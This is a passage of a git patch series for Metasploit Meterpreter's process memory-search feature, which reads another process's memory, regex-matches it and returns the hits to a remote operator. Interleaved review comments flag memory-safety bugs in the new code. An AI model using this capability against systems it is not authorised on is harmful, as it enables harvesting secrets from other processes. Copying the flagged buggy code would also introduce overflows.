= ERROR_INVALID_ADDRESS; goto done; } - - const OPENPROCESS OpenProcess = (OPENPROCESS)open_process; - const CLOSEHANDLE CloseHandle = (CLOSEHANDLE)close_handle; - const VIRTUALQUERYEX VirtualQueryEx = (VIRTUALQUERYEX)virtual_query_ex; - const 
NTREADVIRTUALMEMORY NtReadVirtualMemory = (NTREADVIRTUALMEMORY)nt_read_virtual_memory; + const NTSTATUS setup_handles_result = setup_handles(); + if (setup_handles_result != ERROR_SUCCESS) { dprintf("[MEM SEARCH] Could not set up all necessary handles & proc addresses"); result = setup_handles_result; goto done; } const DWORD process_vm_read = 0x0010; const DWORD process_query_information = 0x0400; const DWORD wanted_process_perms = process_vm_read | process_query_information; dprintf("[MEM SEARCH] Opening process"); - process_handle = OpenProcess(wanted_process_perms, FALSE, pid); + process_handle = fOpenProcess(wanted_process_perms, FALSE, pid); if (process_handle == NULL) { dprintf("[MEM SEARCH] Could not get process handle"); result = ERROR_INVALID_HANDLE; goto done; } MEMORY_BASIC_INFORMATION mem = { 0 }; - const size_t megabytes_64 = 64 * 1024 * 1024; - dprintf("[MEM SEARCH] Allocating buffer for storing process memory"); - buffer = (char*)malloc(megabytes_64); + buffer = (char*)malloc(MEMORY_BUFFER_SIZE); if (buffer == NULL) { dprintf("[MEM SEARCH] Could not allocate memory buffer"); result = ERROR_OUTOFMEMORY; goto done; } - // The maximum length of data that we can read into a buffer at a time from a memory region. - const size_t current_max_size = megabytes_64; - - for (size_t current_ptr = 0; VirtualQueryEx(process_handle, (LPCVOID)current_ptr, &mem, sizeof(mem)); current_ptr += mem.RegionSize) + for (size_t current_ptr = 0; fVirtualQueryEx(process_handle, (LPCVOID)current_ptr, &mem, sizeof(mem)); current_ptr += mem.RegionSize) { if (!can_read_memory(mem.Protect)) { continue; } 
@@ -579,14 +670,14 @@ DWORD request_sys_process_memory_search(Remote* remote, Packet* packet) while (mem.RegionSize > memory_region_offset) { const size_t leftover_bytes = mem.RegionSize - memory_region_offset; - const size_t bytes_to_read = min(leftover_bytes, current_max_size); + const size_t bytes_to_read = min(leftover_bytes, MEMORY_BUFFER_SIZE); dprintf("[MEM SEARCH] Leftover Bytes count: %llu", leftover_bytes); dprintf("[MEM SEARCH] Bytes to read: %llu", bytes_to_read); size_t bytes_read = 0; const size_t read_address = (size_t)mem.BaseAddress + memory_region_offset; // Note: This will read up to a maximum of bytes_to_read OR to the end of the memory region if the end of it has been reached. - const NTSTATUS read_virtual_memory_status = NtReadVirtualMemory(process_handle, (LPCVOID)read_address, buffer, bytes_to_read, &bytes_read); + const NTSTATUS read_virtual_memory_status = fNtReadVirtualMemory(process_handle, (LPCVOID)read_address, buffer, bytes_to_read, &bytes_read); if (read_virtual_memory_status != ERROR_SUCCESS) { dprintf("[MEM SEARCH] Failed to read some virtual memory for process, skipping %u bytes", bytes_to_read); memory_region_offset += bytes_to_read; continue; } dprintf("[MEM SEARCH] Read %llu bytes", bytes_read); @@ -595,7 +686,6 @@ DWORD request_sys_process_memory_search(Remote* remote, Packet* packet) for (size_t current_needle_index = 0; current_needle_index < needle_enum_index; current_needle_index++) { - // This is the buffer offset for this needle only. size_t current_buffer_offset = 0; size_t match_length = 0; int result = -1; 
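Review bot: `read_virtual_memory_status != ERROR_SUCCESS` treats every non-zero NTSTATUS from `fNtReadVirtualMemory` as a total failure and skips `bytes_to_read` bytes, discarding `bytes_read` even if the call filled part of the buffer (if the routine reports a partial-copy status with `bytes_read` set, as the NT API documents for partially readable ranges, those bytes are never searched); the commit also removed the `NT_SUCCESS` macro that would have expressed the check. Consider `if (read_virtual_memory_status != ERROR_SUCCESS && bytes_read == 0)` so a partial read is still processed, and note that the skip message formats the `size_t` `bytes_to_read` with `%u` while the neighbouring dprintf calls use `%llu`. The surrounding loop starts and ends outside this hunk.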
@@ -609,38 +699,22 @@ DWORD request_sys_process_memory_search(Remote* remote, Packet* packet) if (result != -1) { - const size_t match_address = read_address + result; + const size_t match_address = read_address + current_buffer_offset + result; dprintf("[MEM SEARCH] -- ! FOUND A REGEX MATCH ! --"); dprintf("[MEM SEARCH] Address: %p", match_address); - dprintf("[MEM SEARCH] Creating results group"); - - Packet* search_results = met_api->packet.create_group(); - if (search_results == NULL) { dprintf("[MEM SEARCH] Could not create search result group"); result = ERROR_OUTOFMEMORY; goto done; } - - dprintf("[MEM SEARCH] Adding results to packet group"); + if (match_length < min_match_length) + { + dprintf("[MEM SEARCH] Match length was too short, skipping."); + current_buffer_offset += (result + match_length); + continue; + } - dprintf("[MEM SEARCH] Adding Match bytes"); // TODO: Add a workaround for match length to the regex itself, allowing the regex engine to stop matching once an upper limit has been reached. const size_t current_match_length = min(max_match_length, match_length); - - // Note: This raw data needs to be read from the buffer we copied. Trying to read it from mem.BaseAddress directly will make us crash. 
- met_api->packet.add_tlv_raw(search_results, TLV_TYPE_MEMORY_SEARCH_MATCH_STR, buffer + current_buffer_offset + result, (DWORD)current_match_length); - - dprintf("[MEM SEARCH] Adding Match address"); - met_api->packet.add_tlv_qword(search_results, TLV_TYPE_MEMORY_SEARCH_MATCH_ADDR, match_address); - - dprintf("[MEM SEARCH] Adding Region base address"); - met_api->packet.add_tlv_qword(search_results, TLV_TYPE_MEMORY_SEARCH_START_ADDR, (size_t)mem.BaseAddress); - - dprintf("[MEM SEARCH] Adding Region size"); - met_api->packet.add_tlv_qword(search_results, TLV_TYPE_MEMORY_SEARCH_SECT_LEN, mem.RegionSize); - - dprintf("[MEM SEARCH] Adding Match Length"); - met_api->packet.add_tlv_uint(search_results, TLV_TYPE_MEMORY_SEARCH_MATCH_LEN, (UINT)current_match_length); - - dprintf("[MEM SEARCH] Adding Group"); - met_api->packet.add_group(response, TLV_TYPE_MEMORY_SEARCH_RESULTS, search_results); + const char* memory_buffer_ptr = buffer + current_buffer_offset + result; + const NTSTATUS add_needles_result = add_needle_results_to_packet(&response, memory_buffer_ptr, current_match_length, match_address, (size_t)mem.BaseAddress, mem.RegionSize); + if (add_needles_result != ERROR_SUCCESS) { dprintf("[MEM SEARCH] Adding search results to packet was not successful"); } current_buffer_offset += (result + current_match_length); } 
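Review bot: Both branches advance `current_buffer_offset` by `result + match_length` (or `result + current_match_length`), so a zero-length match reported at `result == 0` leaves the offset unchanged and the loop, whose header lies outside this hunk, re-runs on the same position; whether `re_matchp` can report such a match depends on the needle (a pattern ending in `*` or `?` looks capable of it in the re.c hunk of the first patch). Guarantee progress in the short-match branch with `current_buffer_offset += result + (match_length == 0 ? 1 : match_length);` and apply the same guard on the success path. A failed `add_needle_results_to_packet` is only logged and the scan continues, which is a reasonable best-effort choice but deserves a one-line comment saying so.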
@@ -658,22 +732,13 @@ DWORD request_sys_process_memory_search(Remote* remote, Packet* packet) done: dprintf("[MEM SEARCH] Memory Search complete."); if (buffer != NULL) { dprintf("[MEM SEARCH] Freeing process memory buffer."); free(buffer); } - if (process_handle != NULL) { dprintf("[MEM SEARCH] Closing process handle."); CloseHandle(process_handle); } + if (process_handle != NULL) { dprintf("[MEM SEARCH] Closing process handle."); fCloseHandle(process_handle); } dprintf("[MEM SEARCH] Cleaning up needles"); for (size_t i = 0; i < needle_enum_index; i++) { - if (regex_needles[i] != NULL) - { - if (regex_needles[i]->raw_needle_buffer != NULL) - { - dprintf("[MEM SEARCH] Freeing needle buffer"); - free(regex_needles[i]->raw_needle_buffer); - } - - dprintf("[MEM SEARCH] Freeing regex needle."); - free(regex_needles[i]); - } + const NTSTATUS cleanup_result = cleanup_needle(®ex_needles[i]); + if (cleanup_result == ERROR_INVALID_PARAMETER) { dprintf("[MEM SEARCH] Could not clean up needle"); } } dprintf("[MEM SEARCH] Transmitting response"); diff --git a/c/meterpreter/source/tiny-regex-c/re.c b/c/meterpreter/source/tiny-regex-c/re.c index 0568bb994..b5fd887c3 100644 --- a/c/meterpreter/source/tiny-regex-c/re.c +++ b/c/meterpreter/source/tiny-regex-c/re.c @@ -34,11 +34,7 @@ /* Definitions: */ -#define MAX_REGEXP_OBJECTS 256 /* Max number of regex symbols in expression. */ -#define MAX_CHAR_CLASS_LEN 256 /* Max length of character-class buffer in. */ - - -enum { UNUSED, DOT, BEGIN, END, QUESTIONMARK, STAR, PLUS, CHAR, CHAR_CLASS, INV_CHAR_CLASS, DIGIT, NOT_DIGIT, ALPHA, NOT_ALPHA, WHITESPACE, NOT_WHITESPACE, /* BRANCH */ }; +enum { UNUSED, DOT, BEGIN, END, QUESTIONMARK, STAR, PLUS, CHAR_RE, CHAR_CLASS, INV_CHAR_CLASS, DIGIT, NOT_DIGIT, ALPHA, NOT_ALPHA, WHITESPACE, NOT_WHITESPACE, /* BRANCH */ }; /* Private function declarations: */ static int matchpattern(regex_t* pattern, const char* text, size_t text_length, size_t text_offset, size_t* matchlength); 
@@ -54,14 +50,7 @@ static int matchrange(char c, const char* str); static int matchdot(char c); static int ismetachar(char c); - - /* Public functions: */ -int re_match(const char* pattern, size_t pattern_length, const char* text, size_t text_length, size_t* matchlength) -{ - return re_matchp(re_compile(pattern, pattern_length), text, text_length, matchlength); -} - int re_matchp(re_t pattern, const char* text, size_t text_length, size_t* matchlength) { *matchlength = 0; 
@@ -89,146 +78,135 @@ int re_matchp(re_t pattern, const char* text, size_t text_length, size_t* matchl return -1; } -re_t re_compile(const char* pattern, size_t pattern_length) +int re_compile(const char* pattern, size_t pattern_length, size_t max_regex_objects, size_t max_char_class_len, re_t* out_compiled, unsigned char** out_ccl) { - /* The sizes of the two static arrays below substantiates the static RAM usage of this module. - MAX_REGEXP_OBJECTS is the max number of symbols in the expression. - MAX_CHAR_CLASS_LEN determines the size of buffer for chars in all char-classes in the expression. */ - static regex_t re_compiled[MAX_REGEXP_OBJECTS]; - static unsigned char ccl_buf[MAX_CHAR_CLASS_LEN]; - int ccl_bufidx = 1; - - char c; /* current char in pattern */ - int i = 0; /* index into pattern */ - int j = 0; /* index into re_compiled */ - - while (i < (int)pattern_length && (j+1 < MAX_REGEXP_OBJECTS)) - { - c = pattern[i]; + if (out_compiled == NULL || out_ccl == NULL) { return 1; } - switch (c) - { - /* Meta-characters: */ - case '^': { re_compiled[j].type = BEGIN; } break; - case '$': { re_compiled[j].type = END; } break; - case '.': { re_compiled[j].type = DOT; } break; - case '*': { re_compiled[j].type = STAR; } break; - case '+': { re_compiled[j].type = PLUS; } break; - case '?': { re_compiled[j].type = QUESTIONMARK; } break; -/* case '|': { re_compiled[j].type = BRANCH; } break; <-- not working properly */ - - /* Escaped character-classes (\s \w ...): */ - case '\\': - { - if (i + 1 < (int)pattern_length) - { - /* Skip the escape-char '\\' */ - i += 1; - /* ... 
and check the next */ - switch (pattern[i]) - { - /* Meta-character: */ - case 'd': { re_compiled[j].type = DIGIT; } break; - case 'D': { re_compiled[j].type = NOT_DIGIT; } break; - case 'w': { re_compiled[j].type = ALPHA; } break; - case 'W': { re_compiled[j].type = NOT_ALPHA; } break; - case 's': { re_compiled[j].type = WHITESPACE; } break; - case 'S': { re_compiled[j].type = NOT_WHITESPACE; } break; - - /* Escaped character, e.g. '.' or '$' */ - default: - { - re_compiled[j].type = CHAR; - re_compiled[j].u.ch = pattern[i]; - } break; - } - } - /* '\\' as last char in pattern -> invalid regular expression. */ -/* - else - { - re_compiled[j].type = CHAR; - re_compiled[j].ch = pattern[i]; - } -*/ - } break; + int ccl_bufidx = 1; - /* Character class: */ - case '[': - { - /* Remember where the char-buffer starts. */ - int buf_begin = ccl_bufidx; + char c; /* current char in pattern */ + int i = 0; /* index into pattern */ + int j = 0; /* index into re_compiled */ + + while (i < (int)pattern_length && (j + 1 < MAX_REGEXP_OBJECTS)) + { + c = pattern[i]; - /* Look-ahead to determine if negated */ - if (pattern[i+1] == '^') + switch (c) { - re_compiled[j].type = INV_CHAR_CLASS; - i += 1; /* Increment i to avoid including '^' in the char-buffer */ - if (pattern[i+1] == 0) /* incomplete pattern, missing non-zero char after '^' */ - { - return 0; - } - } - else + /* Meta-characters: */ + case '^': { (*out_compiled)[j].type = BEGIN; } break; + case '$': { (*out_compiled)[j].type = END; } break; + case '.': { (*out_compiled)[j].type = DOT; } break; + case '*': { (*out_compiled)[j].type = STAR; } break; + case '+': { (*out_compiled)[j].type = PLUS; } break; + case '?': { (*out_compiled)[j].type = QUESTIONMARK; } break; + /* case '|': { re_compiled[j].type = BRANCH; } break; <-- not working properly */ + + /* Escaped character-classes (\s \w ...): */ + case '\\': { - re_compiled[j].type = CHAR_CLASS; - } + if (i + 1 < (int)pattern_length) + { + /* Skip the escape-char '\\' */ 
+ i += 1; + /* ... and check the next */ + switch (pattern[i]) + { + /* Meta-character: */ + case 'd': { (*out_compiled)[j].type = DIGIT; } break; + case 'D': { (*out_compiled)[j].type = NOT_DIGIT; } break; + case 'w': { (*out_compiled)[j].type = ALPHA; } break; + case 'W': { (*out_compiled)[j].type = NOT_ALPHA; } break; + case 's': { (*out_compiled)[j].type = WHITESPACE; } break; + case 'S': { (*out_compiled)[j].type = NOT_WHITESPACE; } break; + + /* Escaped character, e.g. '.' or '$' */ + default: + { + (*out_compiled)[j].type = CHAR_RE; + (*out_compiled)[j].u.ch = pattern[i]; + } break; + } + } + else + { + (*out_compiled)[j].type = CHAR_RE; + (*out_compiled)[j].u.ch = pattern[i]; + } + } break; - /* Copy characters inside [..] to buffer */ - while ( (pattern[++i] != ']') - && (pattern[i] != '\0')) /* Missing ] */ + /* Character class: */ + case '[': { - if (pattern[i] == '\\') - { - if (ccl_bufidx >= MAX_CHAR_CLASS_LEN - 1) + /* Remember where the char-buffer starts. */ + int buf_begin = ccl_bufidx; + + /* Look-ahead to determine if negated */ + if (pattern[i + 1] == '^') { - //fputs("exceeded internal buffer!\n", stderr); - return 0; + (*out_compiled)[j].type = INV_CHAR_CLASS; + i += 1; /* Increment i to avoid including '^' in the char-buffer */ + if (i + 1 == (int)pattern_length) /* incomplete pattern, missing non-zero char after '^' */ + { + return 1; + } } - if (pattern[i+1] == 0) /* incomplete pattern, missing non-zero char after '\\' */ + else { - return 0; + (*out_compiled)[j].type = CHAR_CLASS; } - ccl_buf[ccl_bufidx++] = pattern[i++]; - } - else if (ccl_bufidx >= MAX_CHAR_CLASS_LEN) - { - //fputs("exceeded internal buffer!\n", stderr); - return 0; - } - ccl_buf[ccl_bufidx++] = pattern[i]; - } - if (ccl_bufidx >= MAX_CHAR_CLASS_LEN) + + /* Copy characters inside [..] 
to buffer */ + while ((pattern[++i] != ']') + && (i < (int)pattern_length)) /* Missing ] */ + { + if (pattern[i] == '\\') + { + if (ccl_bufidx >= MAX_CHAR_CLASS_LEN - 1) + { + //fputs("exceeded internal buffer!\n", stderr); + return 1; + } + if (i + 1 == (int)pattern_length) /* incomplete pattern, missing non-zero char after '\\' */ + { + return 1; + } + (*out_ccl)[ccl_bufidx++] = pattern[i++]; + } + else if (ccl_bufidx >= MAX_CHAR_CLASS_LEN) + { + //fputs("exceeded internal buffer!\n", stderr); + return 1; + } + (*out_ccl)[ccl_bufidx++] = pattern[i]; + } + if (ccl_bufidx >= MAX_CHAR_CLASS_LEN) + { + /* Catches cases such as [00000000000000000000000000000000000000][ */ + //fputs("exceeded internal buffer!\n", stderr); + return 1; + } + /* Null-terminate string end */ + (*out_ccl)[ccl_bufidx++] = 0; + (*out_compiled)[j].u.ccl = &(*out_ccl)[buf_begin]; + } break; + + /* Other characters: */ + default: { - /* Catches cases such as [00000000000000000000000000000000000000][ */ - //fputs("exceeded internal buffer!\n", stderr); - return 0; + (*out_compiled)[j].type = CHAR_RE; + (*out_compiled)[j].u.ch = c; + } break; } - /* Null-terminate string end */ - ccl_buf[ccl_bufidx++] = 0; - re_compiled[j].u.ccl = &ccl_buf[buf_begin]; - } break; - /* Other characters: */ - default: - { - re_compiled[j].type = CHAR; - re_compiled[j].u.ch = c; - } break; + i += 1; + j += 1; } - /* no buffer-out-of-bounds access on invalid patterns - see https://github.com/kokke/tiny-regex-c/commit/1a279e04014b70b0695fba559a7c05d55e6ee90b */ - if (pattern[i] == 0) - { - return 0; - } - - i += 1; - j += 1; - } - /* 'UNUSED' is a sentinel used to indicate end-of-pattern */ - re_compiled[j].type = UNUSED; + /* 'UNUSED' is a sentinel used to indicate end-of-pattern */ + (*out_compiled)[j].type = UNUSED; - return (re_t) re_compiled; + return 0; // ERROR_SUCCESS } void re_print(regex_t* pattern) 
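Review bot: The new `max_regex_objects` and `max_char_class_len` parameters are never read — the loop bound and every buffer check still use `MAX_REGEXP_OBJECTS` / `MAX_CHAR_CLASS_LEN` — so a caller that passes smaller buffers than the macros get overrun; either honour them (`j + 1 < (int)max_regex_objects`, `ccl_bufidx >= (int)max_char_class_len`) or drop them from the signature. The character-class loop reads `pattern[++i]` before comparing `i` with `pattern_length`, so a class with no closing `]` reads one byte past the pattern; reorder it to `while ((++i < (int)pattern_length) && (pattern[i] != ']'))`, and the `pattern[i + 1] == '^'` look-ahead needs the same `i + 1 < (int)pattern_length` guard. The previous version rejected a pattern that ends inside `[...]` (`if (pattern[i] == 0) return 0;`), whereas this one null-terminates the partial class and returns success; if that is intentional it should be commented. `re_compile` is declared in this hunk and its body ends here, but the prototype in re.h should state the same buffer-size contract.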
@@ -260,7 +238,7 @@ void re_print(regex_t* pattern) } printf("]"); } - else if (pattern[i].type == CHAR) + else if (pattern[i].type == CHAR_RE) { printf(" '%c'", pattern[i].u.ch); } diff --git a/c/meterpreter/source/tiny-regex-c/re.h b/c/meterpreter/source/tiny-regex-c/re.h index bd084cccb..45b8cdf11 100644 --- a/c/meterpreter/source/tiny-regex-c/re.h +++ b/c/meterpreter/source/tiny-regex-c/re.h @@ -55,18 +55,14 @@ typedef struct regex_t /* Typedef'd pointer to get abstract datatype. */ typedef struct regex_t* re_t; - -/* Compile regex string pattern to a regex_t-array. */ -re_t re_compile(const char* pattern, size_t pattern_length); - +#define MAX_REGEXP_OBJECTS 255 /* Max number of regex symbols in expression. */ +#define MAX_CHAR_CLASS_LEN 255 /* Max length of character-class buffer in. */ /* Find matches of the compiled pattern inside text. */ int re_matchp(re_t pattern, const char* text, size_t text_length, size_t* matchlength); - -/* Find matches of the txt pattern inside text (will compile automatically first). */ -int re_match(const char* pattern, size_t pattern_length, const char* text, size_t text_length, size_t* matchlength); - +/* Compile a regular expression in-place, allowing for multiple needles to be compiled without the usage of a static buffer. Returns ERROR_SUCCESS (0) on success, else 1. */ +int re_compile(const char* pattern, size_t pattern_length, size_t max_regex_objects, size_t max_char_class_len, re_t* out_compiled, unsigned char** out_ccl); #ifdef __cplusplus } From 8f51ee7e6d21182f202287769da4ba04484bab05 Mon Sep 17 00:00:00 2001 From: sjanusz-r7 Date: Fri, 8 Dec 2023 18:32:47 +0000 Subject: [PATCH 03/14] Move defs to top of file, remove pointer-to-pointer, make RegexNeedle contain static-size arrays --- .../stdapi/server/sys/process/memory.c | 342 +++++++----------- c/meterpreter/source/tiny-regex-c/re.c | 66 ++-- c/meterpreter/source/tiny-regex-c/re.h | 2 +- 3 files changed, 155 insertions(+), 255 deletions(-) 
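Review bot: The new `re_compile` prototype's comment does not say what the caller must supply: `*out_compiled` has to point at `MAX_REGEXP_OBJECTS` `regex_t` entries, `*out_ccl` at `MAX_CHAR_CLASS_LEN` bytes, and the compiled pattern stores pointers into `*out_ccl` (`u.ccl`), so that buffer must outlive every `re_matchp` call on the result. The `max_regex_objects` / `max_char_class_len` parameters are undocumented as well; I would extend the comment with `out_compiled must hold MAX_REGEXP_OBJECTS regex_t and out_ccl MAX_CHAR_CLASS_LEN bytes; the compiled regex references out_ccl, so both must stay valid while it is used.` Describing the return as `ERROR_SUCCESS` in a header that does not include a Windows header is slightly misleading — `0` is what the function returns.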
diff --git a/c/meterpreter/source/extensions/stdapi/server/sys/process/memory.c b/c/meterpreter/source/extensions/stdapi/server/sys/process/memory.c
index 4d2eef43a..e592dd4ce 100644
--- a/c/meterpreter/source/extensions/stdapi/server/sys/process/memory.c
+++ b/c/meterpreter/source/extensions/stdapi/server/sys/process/memory.c
@@ -2,6 +2,89 @@ #include "common_metapi.h" #include "../tiny-regex-c/re.h" +#ifndef __kernel_entry +#define __kernel_entry +#endif + +typedef __kernel_entry NTSTATUS(WINAPI* NTQUERYINFORMATIONPROCESS) (HANDLE ProcessHandle, DWORD ProcessInformationClass, LPVOID ProcessInformation, ULONG ProcessInformationLength, PULONG ReturnLength); + +typedef SIZE_T(WINAPI* VIRTUALQUERYEX) (HANDLE hProcess, LPCVOID lpAddress, PMEMORY_BASIC_INFORMATION lpBuffer, SIZE_T dwLength); + +typedef BOOL(WINAPI* CLOSEHANDLE) (HANDLE hObject); + +typedef HANDLE(WINAPI* OPENPROCESS) (DWORD dwDesiredAccess, BOOL bInheritHandle, DWORD dwProcessId); + +typedef FARPROC(WINAPI* GETPROCADDRESS) (HMODULE hModule, LPCSTR lpProcName); + +// http://undocumented.ntinternals.net/index.html?page=UserMode%2FUndocumented%20Functions%2FMemory%20Management%2FVirtual%20Memory%2FNtReadVirtualMemory.html +// https://ntdoc.m417z.com/ntreadvirtualmemory +typedef NTSTATUS(NTAPI* NTREADVIRTUALMEMORY) (HANDLE ProcessHandle, LPCVOID BaseAddress, LPVOID Buffer, SIZE_T NumberOfBytesToRead, PSIZE_T NumberOfBytesRead); + +// http://undocumented.ntinternals.net/index.html?page=UserMode%2FUndocumented%20Functions%2FMemory%20Management%2FVirtual%20Memory%2FMEMORY_INFORMATION_CLASS.html +typedef enum _MEMORY_INFORMATION_CLASS { + MemoryBasicInformation +} MEMORY_INFORMATION_CLASS, * PMEMORY_INFORMATION_CLASS; + +typedef struct _UNICODE_STRING { + USHORT Length; + USHORT MaximumLength; + PWSTR Buffer; +} UNICODE_STRING; +typedef UNICODE_STRING* PUNICODE_STRING; +typedef const UNICODE_STRING* PCUNICODE_STRING; + +// https://learn.microsoft.com/en-us/windows/win32/api/ntdef/ns-ntdef-_object_attributes +typedef struct _OBJECT_ATTRIBUTES { + ULONG Length; + HANDLE RootDirectory; + PUNICODE_STRING ObjectName; + ULONG Attributes; + PVOID SecurityDescriptor; + PVOID SecurityQualityOfService; +} OBJECT_ATTRIBUTES, * POBJECT_ATTRIBUTES; + +typedef struct _RTL_USER_PROCESS_PARAMETERS { + BYTE Reserved1[16]; + PVOID Reserved2[10]; + 
UNICODE_STRING ImagePathName; + UNICODE_STRING CommandLine; +} RTL_USER_PROCESS_PARAMETERS, * PRTL_USER_PROCESS_PARAMETERS; + +typedef +VOID +(NTAPI* PPS_POST_PROCESS_INIT_ROUTINE) ( + VOID + ); + +typedef struct _PEB { + BYTE Reserved1[2]; + BYTE BeingDebugged; + BYTE Reserved2[1]; + PVOID Reserved3[2]; + PPEB_LDR_DATA Ldr; + PRTL_USER_PROCESS_PARAMETERS ProcessParameters; + BYTE Reserved4[104]; + PVOID Reserved5[52]; + PPS_POST_PROCESS_INIT_ROUTINE PostProcessInitRoutine; + BYTE Reserved6[128]; + PVOID Reserved7[1]; + ULONG SessionId; +} PEB, * PPEB; + +typedef struct _PROCESS_BASIC_INFORMATION { + PVOID Reserved1; + PPEB PebBaseAddress; + PVOID Reserved2[2]; + ULONG_PTR UniqueProcessId; + PVOID Reserved3; +} PROCESS_BASIC_INFORMATION; +typedef PROCESS_BASIC_INFORMATION* PPROCESS_BASIC_INFORMATION; + +typedef enum _PROCESSINFOCLASS { + ProcessBasicInformation = 0, + ProcessWow64Information = 26 +} PROCESSINFOCLASS; + /*! * @brief Allocates memory in the context of the supplied process. * @remark The 
@@ -341,89 +424,6 @@ DWORD request_sys_process_memory_unlock(Remote *remote, Packet *packet) return ERROR_SUCCESS; } -#ifndef __kernel_entry - #define __kernel_entry -#endif - -typedef __kernel_entry NTSTATUS(WINAPI* NTQUERYINFORMATIONPROCESS) (HANDLE ProcessHandle, DWORD ProcessInformationClass, LPVOID ProcessInformation, ULONG ProcessInformationLength, PULONG ReturnLength); - -typedef SIZE_T(WINAPI* VIRTUALQUERYEX) (HANDLE hProcess, LPCVOID lpAddress, PMEMORY_BASIC_INFORMATION lpBuffer, SIZE_T dwLength); - -typedef BOOL(WINAPI* CLOSEHANDLE) (HANDLE hObject); - -typedef HANDLE(WINAPI* OPENPROCESS) (DWORD dwDesiredAccess, BOOL bInheritHandle, DWORD dwProcessId); - -typedef FARPROC(WINAPI* GETPROCADDRESS) (HMODULE hModule, LPCSTR lpProcName); - -// http://undocumented.ntinternals.net/index.html?page=UserMode%2FUndocumented%20Functions%2FMemory%20Management%2FVirtual%20Memory%2FNtReadVirtualMemory.html -// https://ntdoc.m417z.com/ntreadvirtualmemory -typedef NTSTATUS(NTAPI* NTREADVIRTUALMEMORY) (HANDLE ProcessHandle, LPCVOID BaseAddress, LPVOID Buffer, SIZE_T NumberOfBytesToRead, PSIZE_T NumberOfBytesRead); - -// http://undocumented.ntinternals.net/index.html?page=UserMode%2FUndocumented%20Functions%2FMemory%20Management%2FVirtual%20Memory%2FMEMORY_INFORMATION_CLASS.html -typedef enum _MEMORY_INFORMATION_CLASS { - MemoryBasicInformation -} MEMORY_INFORMATION_CLASS, * PMEMORY_INFORMATION_CLASS; - -typedef struct _UNICODE_STRING { - USHORT Length; - USHORT MaximumLength; - PWSTR Buffer; -} UNICODE_STRING; -typedef UNICODE_STRING* PUNICODE_STRING; -typedef const UNICODE_STRING* PCUNICODE_STRING; - -// https://learn.microsoft.com/en-us/windows/win32/api/ntdef/ns-ntdef-_object_attributes -typedef struct _OBJECT_ATTRIBUTES { - ULONG Length; - HANDLE RootDirectory; - PUNICODE_STRING ObjectName; - ULONG Attributes; - PVOID SecurityDescriptor; - PVOID SecurityQualityOfService; -} OBJECT_ATTRIBUTES, * POBJECT_ATTRIBUTES; - -typedef struct _RTL_USER_PROCESS_PARAMETERS { - BYTE 
Reserved1[16]; - PVOID Reserved2[10]; - UNICODE_STRING ImagePathName; - UNICODE_STRING CommandLine; -} RTL_USER_PROCESS_PARAMETERS, * PRTL_USER_PROCESS_PARAMETERS; - -typedef -VOID -(NTAPI* PPS_POST_PROCESS_INIT_ROUTINE) ( - VOID - ); - -typedef struct _PEB { - BYTE Reserved1[2]; - BYTE BeingDebugged; - BYTE Reserved2[1]; - PVOID Reserved3[2]; - PPEB_LDR_DATA Ldr; - PRTL_USER_PROCESS_PARAMETERS ProcessParameters; - BYTE Reserved4[104]; - PVOID Reserved5[52]; - PPS_POST_PROCESS_INIT_ROUTINE PostProcessInitRoutine; - BYTE Reserved6[128]; - PVOID Reserved7[1]; - ULONG SessionId; -} PEB, * PPEB; - -typedef struct _PROCESS_BASIC_INFORMATION { - PVOID Reserved1; - PPEB PebBaseAddress; - PVOID Reserved2[2]; - ULONG_PTR UniqueProcessId; - PVOID Reserved3; -} PROCESS_BASIC_INFORMATION; -typedef PROCESS_BASIC_INFORMATION* PPROCESS_BASIC_INFORMATION; - -typedef enum _PROCESSINFOCLASS { - ProcessBasicInformation = 0, - ProcessWow64Information = 26 -} PROCESSINFOCLASS; - BOOL can_read_memory(DWORD memory_protect) { const int page_execute_read = 0x20; @@ -437,14 +437,10 @@ BOOL can_read_memory(DWORD memory_protect) memory_protect == page_readwrite; } -// In order to be able to regex null-butes, we need to store the length explicitly, so that null-bytes aren't being treated as the end of a string. -struct regex_needle -{ - char* raw_needle_buffer; - size_t length; - regex_t* compiled_needle; - unsigned char* char_buf; -}; +typedef struct { + re_t compiled_regex[MAX_REGEXP_OBJECTS]; + unsigned char buffer[MAX_CHAR_CLASS_LEN]; // Used for character strings when "[]" is used. +} RegexNeedle; #define NEEDLES_MAX (size_t)5 #define MEMORY_BUFFER_SIZE (size_t)(64 * 1024 * 1024) 
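Review bot: `compiled_regex` is declared as `re_t compiled_regex[MAX_REGEXP_OBJECTS]`, but `re_t` is `struct regex_t*` (re.h hunk above), so this is an array of 255 pointers while `re_compile` writes 255 `regex_t` objects into it through the `(re_t)&regex_needles[i].compiled_regex` casts at the call sites; a `regex_t` carries a `type` plus a union holding the `u.ccl` pointer, so it is larger than one pointer and a needle with more than roughly half the symbol limit overruns `compiled_regex` into `buffer` and past the end of the `RegexNeedle`, which lives in the request handler's stack frame. Declare it as `regex_t compiled_regex[MAX_REGEXP_OBJECTS];` and pass `regex_needles[i].compiled_regex` / `regex_needles[i].buffer` without casts in the `re_compile` and `re_matchp` calls (the `@@ -606` and `@@ -692` hunks below) — the casts are what hid the mismatch. With that element type the `= { NULL }` initialiser in `@@ -606` should become `= { 0 }`.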
@@ -452,116 +448,25 @@ struct regex_needle /// /// Add the needle results to a packet. This automatically inserts each result into a new group. Returns ERROR_SUCCESS on success, or 1 on failure. /// -/// The packet to insert the needle goup into +/// The packet to insert the needle group into /// ERROR_SUCCESS on success, else non-zero -NTSTATUS add_needle_results_to_packet(Packet** out, const char* memory_buffer_ptr, size_t match_length, size_t match_address, size_t memory_base_address, size_t memory_region_size) +NTSTATUS add_needle_results_to_packet(Packet* packet, const unsigned char* memory_buffer_ptr, size_t match_length, size_t match_address, size_t memory_base_address, size_t memory_region_size) { - if (out == NULL || memory_buffer_ptr == NULL) { return ERROR_INVALID_PARAMETER; } + if (packet == NULL || memory_buffer_ptr == NULL) { return ERROR_INVALID_PARAMETER; } dprintf("[MEM SEARCH] Creating results group"); - Packet* search_results = met_api->packet.create_group(); if (search_results == NULL) { dprintf("[MEM SEARCH] Could not create search result group"); return ERROR_OUTOFMEMORY; } dprintf("[MEM SEARCH] Adding results to packet group"); - - dprintf("[MEM SEARCH] Adding Match bytes"); // Note: This raw data needs to be read from the buffer we copied. Trying to read it from mem.BaseAddress directly will make us crash. 
